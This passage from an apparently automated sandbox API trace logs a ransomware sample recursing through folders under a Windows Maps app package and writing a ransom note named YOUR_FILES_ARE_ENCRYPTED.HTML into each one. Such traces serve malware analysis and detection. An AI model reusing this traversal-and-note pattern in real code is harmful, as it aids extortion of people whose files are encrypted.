ftLastWriteTime.dwLowDateTime=0x13de0140, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6da498, dwReserved1=0x62e9e8, cFileName="..", cAlternateFileName="")) returned 1 [0120.428] FindNextFileW (in: hFindFile=0x6266f8, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x13de0140, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x13de0140, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x13de0140, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6da498, dwReserved1=0x62e9e8, cFileName="..", cAlternateFileName="")) returned 0 [0120.428] FindClose (in: hFindFile=0x6266f8 | out: hFindFile=0x6266f8) returned 1 [0120.428] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsMaps_8wekyb3d8bbwe\\AC\\INetCache\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 127 [0120.428] GetProcessHeap () returned 0x600000 [0120.428] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x3116fe0 [0120.428] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsMaps_8wekyb3d8bbwe\\AC\\INetCache\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.windowsmaps_8wekyb3d8bbwe\\ac\\inetcache\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x31c [0120.430] WriteFile (in: hFile=0x31c, lpBuffer=0x3116fe0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e17c, lpOverlapped=0x0 | out: lpBuffer=0x3116fe0*, lpNumberOfBytesWritten=0x19e17c*=0x3c00, lpOverlapped=0x0) returned 1 [0120.431] CloseHandle (hObject=0x31c) returned 1 [0120.431] GetProcessHeap () returned 0x600000 [0120.431] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3116fe0 | out: hHeap=0x600000) returned 1 [0120.431] GetProcessHeap () returned 0x600000 [0120.431] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x313b008 | out: hHeap=0x600000) returned 1 [0120.433] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x13de0140, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x13de0140, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x13de0140, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x62ea8a, dwReserved1=0x62e9e0, cFileName="INetCookies", cAlternateFileName="INETCO~1")) returned 1 [0120.433] StrStrIW (lpFirst="INetCookies", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0120.433] wnsprintfW (in: pszDest=0x3106fd8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsMaps_8wekyb3d8bbwe\\AC\\INetCookies") returned 99 [0120.433] GetProcessHeap () returned 0x600000 [0120.433] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x313b008 [0120.434] lstrcpyW (in: lpString1=0x313b008, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsMaps_8wekyb3d8bbwe\\AC\\INetCookies" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsMaps_8wekyb3d8bbwe\\AC\\INetCookies") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsMaps_8wekyb3d8bbwe\\AC\\INetCookies" [0120.434] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsMaps_8wekyb3d8bbwe\\AC\\INetCookies", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsMaps_8wekyb3d8bbwe\\AC\\INetCookies\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsMaps_8wekyb3d8bbwe\\AC\\INetCookies\\*" [0120.434] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsMaps_8wekyb3d8bbwe\\AC\\INetCookies\\*", lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x13de0140, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x13de0140, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x13de0140, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6da498, dwReserved1=0x62e9e8, cFileName=".", cAlternateFileName="")) returned 0x6266f8 [0120.434] FindNextFileW (in: hFindFile=0x6266f8, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x13de0140, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x13de0140, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x13de0140, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6da498, dwReserved1=0x62e9e8, cFileName="..", cAlternateFileName="")) returned 1 [0120.434] FindNextFileW (in: hFindFile=0x6266f8, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x13de0140, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x13de0140, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x13de0140, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6da498, dwReserved1=0x62e9e8, cFileName="..", cAlternateFileName="")) returned 0 [0120.435] FindClose (in: hFindFile=0x6266f8 | out: hFindFile=0x6266f8) returned 1 [0120.435] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsMaps_8wekyb3d8bbwe\\AC\\INetCookies\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 129 [0120.435] GetProcessHeap () returned 0x600000 [0120.435] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x3116fe0 [0120.435] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsMaps_8wekyb3d8bbwe\\AC\\INetCookies\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.windowsmaps_8wekyb3d8bbwe\\ac\\inetcookies\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x31c [0120.436] WriteFile (in: hFile=0x31c, lpBuffer=0x3116fe0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e17c, lpOverlapped=0x0 | out: lpBuffer=0x3116fe0*, lpNumberOfBytesWritten=0x19e17c*=0x3c00, lpOverlapped=0x0) returned 1 [0120.439] CloseHandle (hObject=0x31c) returned 1 [0120.439] GetProcessHeap () returned 0x600000 [0120.439] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3116fe0 | out: hHeap=0x600000) returned 1 [0120.440] GetProcessHeap () returned 0x600000 [0120.440] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x313b008 | out: hHeap=0x600000) returned 1 [0120.440] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x13de0140, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x13de0140, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x13de0140, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x62ea8a, dwReserved1=0x62e9e0, cFileName="INetHistory", cAlternateFileName="INETHI~1")) returned 1 [0120.440] StrStrIW (lpFirst="INetHistory", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0120.440] wnsprintfW (in: pszDest=0x3106fd8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsMaps_8wekyb3d8bbwe\\AC\\INetHistory") returned 99 [0120.440] GetProcessHeap () returned 0x600000 [0120.440] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x313b008 [0120.441] lstrcpyW (in: lpString1=0x313b008, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsMaps_8wekyb3d8bbwe\\AC\\INetHistory" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsMaps_8wekyb3d8bbwe\\AC\\INetHistory") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsMaps_8wekyb3d8bbwe\\AC\\INetHistory" [0120.441] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsMaps_8wekyb3d8bbwe\\AC\\INetHistory", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsMaps_8wekyb3d8bbwe\\AC\\INetHistory\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsMaps_8wekyb3d8bbwe\\AC\\INetHistory\\*" [0120.441] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsMaps_8wekyb3d8bbwe\\AC\\INetHistory\\*", lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x13de0140, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x13de0140, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x13de0140, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6da498, dwReserved1=0x62e9e8, cFileName=".", cAlternateFileName="")) returned 0x6266f8 [0120.442] FindNextFileW (in: hFindFile=0x6266f8, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x13de0140, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x13de0140, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x13de0140, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6da498, dwReserved1=0x62e9e8, cFileName="..", cAlternateFileName="")) returned 1 [0120.442] FindNextFileW (in: hFindFile=0x6266f8, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x13de0140, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x13de0140, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x13de0140, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6da498, dwReserved1=0x62e9e8, cFileName="..", cAlternateFileName="")) returned 0 [0120.442] FindClose (in: hFindFile=0x6266f8 | out: hFindFile=0x6266f8) returned 1 [0120.442] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsMaps_8wekyb3d8bbwe\\AC\\INetHistory\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 129 [0120.442] GetProcessHeap () returned 0x600000 [0120.442] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x3116fe0 [0120.442] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsMaps_8wekyb3d8bbwe\\AC\\INetHistory\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.windowsmaps_8wekyb3d8bbwe\\ac\\inethistory\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x31c [0120.443] WriteFile (in: hFile=0x31c, lpBuffer=0x3116fe0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e17c, lpOverlapped=0x0 | out: lpBuffer=0x3116fe0*, lpNumberOfBytesWritten=0x19e17c*=0x3c00, lpOverlapped=0x0) returned 1 [0120.444] CloseHandle (hObject=0x31c) returned 1 [0120.445] GetProcessHeap () returned 0x600000 [0120.445] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3116fe0 | out: hHeap=0x600000) returned 1 [0120.445] GetProcessHeap () returned 0x600000 [0120.445] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x313b008 | out: hHeap=0x600000) returned 1 [0120.445] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x13de0140, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x13de0140, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x13de0140, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x62ea8a, dwReserved1=0x62e9e0, cFileName="Temp", cAlternateFileName="")) returned 1 [0120.445] StrStrIW (lpFirst="Temp", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0120.445] wnsprintfW (in: pszDest=0x3106fd8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsMaps_8wekyb3d8bbwe\\AC\\Temp") returned 92 [0120.445] GetProcessHeap () returned 0x600000 [0120.445] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x313b008 [0120.445] lstrcpyW (in: lpString1=0x313b008, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsMaps_8wekyb3d8bbwe\\AC\\Temp" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsMaps_8wekyb3d8bbwe\\AC\\Temp") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsMaps_8wekyb3d8bbwe\\AC\\Temp" [0120.445] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsMaps_8wekyb3d8bbwe\\AC\\Temp", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsMaps_8wekyb3d8bbwe\\AC\\Temp\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsMaps_8wekyb3d8bbwe\\AC\\Temp\\*" [0120.445] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsMaps_8wekyb3d8bbwe\\AC\\Temp\\*", lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x13de0140, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x13de0140, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x13de0140, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6da498, dwReserved1=0x62e9e8, cFileName=".", cAlternateFileName="")) returned 0x6266f8 [0120.445] FindNextFileW (in: hFindFile=0x6266f8, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x13de0140, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x13de0140, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x13de0140, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6da498, dwReserved1=0x62e9e8, cFileName="..", cAlternateFileName="")) returned 1 [0120.445] FindNextFileW (in: hFindFile=0x6266f8, lpFindFileData=0x19deb0 | out: lpFindFileData=0x19deb0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x13de0140, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x13de0140, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x13de0140, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6da498, dwReserved1=0x62e9e8, cFileName="..", cAlternateFileName="")) returned 0 [0120.445] FindClose (in: hFindFile=0x6266f8 | out: hFindFile=0x6266f8) returned 1 [0120.445] wnsprintfW (in: pszDest=0x313b008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsMaps_8wekyb3d8bbwe\\AC\\Temp\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 122 [0120.445] GetProcessHeap () returned 0x600000 [0120.445] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x3116fe0 [0120.446] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsMaps_8wekyb3d8bbwe\\AC\\Temp\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.windowsmaps_8wekyb3d8bbwe\\ac\\temp\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x31c [0120.446] WriteFile (in: hFile=0x31c, lpBuffer=0x3116fe0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e17c, lpOverlapped=0x0 | out: lpBuffer=0x3116fe0*, lpNumberOfBytesWritten=0x19e17c*=0x3c00, lpOverlapped=0x0) returned 1 [0120.447] CloseHandle (hObject=0x31c) returned 1 [0120.447] GetProcessHeap () returned 0x600000 [0120.447] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3116fe0 | out: hHeap=0x600000) returned 1 [0120.447] GetProcessHeap () returned 0x600000 [0120.447] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x313b008 | out: hHeap=0x600000) returned 1 [0120.447] FindNextFileW (in: hFindFile=0x626638, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x13de0140, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x13de0140, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x13de0140, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x62ea8a, dwReserved1=0x62e9e0, cFileName="Temp", cAlternateFileName="")) returned 0 [0120.448] FindClose (in: hFindFile=0x626638 | out: hFindFile=0x626638) returned 1 [0120.448] wnsprintfW (in: pszDest=0x3106fd8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsMaps_8wekyb3d8bbwe\\AC\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 117 [0120.448] GetProcessHeap () returned 0x600000 [0120.448] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x3116fe0 [0120.448] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsMaps_8wekyb3d8bbwe\\AC\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.windowsmaps_8wekyb3d8bbwe\\ac\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x324 [0120.448] WriteFile (in: hFile=0x324, lpBuffer=0x3116fe0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e490, lpOverlapped=0x0 | out: lpBuffer=0x3116fe0*, lpNumberOfBytesWritten=0x19e490*=0x3c00, lpOverlapped=0x0) returned 1 [0120.449] CloseHandle (hObject=0x324) returned 1 [0120.450] GetProcessHeap () returned 0x600000 [0120.450] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3116fe0 | out: hHeap=0x600000) returned 1 [0120.450] GetProcessHeap () returned 0x600000 [0120.450] HeapFree (in: hHeap=0x600000, dwFlags=0x0, lpMem=0x3106fd8 | out: hHeap=0x600000) returned 1 [0120.451] FindNextFileW (in: hFindFile=0x6265b8, lpFindFileData=0x19e4d8 | out: lpFindFileData=0x19e4d8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x13d6d4aa, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x13d6d4aa, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x13d6d4aa, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x6363f0, dwReserved1=0xffffffff, cFileName="AppData", cAlternateFileName="")) returned 1 [0120.451] StrStrIW (lpFirst="AppData", lpSrch="YOUR_FILES_ARE_ENCRYPTED.HTML") returned 0x0 [0120.451] wnsprintfW (in: pszDest=0x30f4fc8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsMaps_8wekyb3d8bbwe\\AppData") returned 92 [0120.451] GetProcessHeap () returned 0x600000 [0120.451] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x10000) returned 0x3106fd8 [0120.451] lstrcpyW (in: lpString1=0x3106fd8, lpString2="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsMaps_8wekyb3d8bbwe\\AppData" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsMaps_8wekyb3d8bbwe\\AppData") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsMaps_8wekyb3d8bbwe\\AppData" [0120.452] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsMaps_8wekyb3d8bbwe\\AppData", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsMaps_8wekyb3d8bbwe\\AppData\\*") returned="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsMaps_8wekyb3d8bbwe\\AppData\\*" [0120.452] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsMaps_8wekyb3d8bbwe\\AppData\\*", lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x13d6d4aa, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x13d6d4aa, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x13d6d4aa, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x62ea8a, dwReserved1=0x62e9e0, cFileName=".", cAlternateFileName="")) returned 0x626878 [0120.452] FindNextFileW (in: hFindFile=0x626878, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x13d6d4aa, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x13d6d4aa, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x13d6d4aa, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x62ea8a, dwReserved1=0x62e9e0, cFileName="..", cAlternateFileName="")) returned 1 [0120.452] FindNextFileW (in: hFindFile=0x626878, lpFindFileData=0x19e1c4 | out: lpFindFileData=0x19e1c4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x13d6d4aa, ftCreationTime.dwHighDateTime=0x1d70071, ftLastAccessTime.dwLowDateTime=0x13d6d4aa, ftLastAccessTime.dwHighDateTime=0x1d70071, ftLastWriteTime.dwLowDateTime=0x13d6d4aa, ftLastWriteTime.dwHighDateTime=0x1d70071, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x62ea8a, dwReserved1=0x62e9e0, cFileName="..", cAlternateFileName="")) returned 0 [0120.452] FindClose (in: hFindFile=0x626878 | out: hFindFile=0x626878) returned 1 [0120.452] wnsprintfW (in: pszDest=0x3106fd8, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsMaps_8wekyb3d8bbwe\\AppData\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 122 [0120.452] GetProcessHeap () returned 0x600000 [0120.452] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x8, Size=0x3c00) returned 0x3116fe0 [0120.452] CreateFileW (lpFileName="\\\\?\\C:\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Packages\\Microsoft.WindowsMaps_8wekyb3d8bbwe\\AppData\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\packages\\microsoft.windowsmaps_8wekyb3d8bbwe\\appdata\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x324 [0120.453] WriteFile (in: hFile=0x324, lpBuffer=0x3116fe0*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x19e490, lpOverlapped=0x0 | out: lpBuffer=0x3116fe0*, lpNumberOfBytesWritten=0x19e490*=0x3c00, lpOverlapped=0x0) returned 1 [0120.454] CloseHandle (hObject=0x324) returned 1 [0120.454] 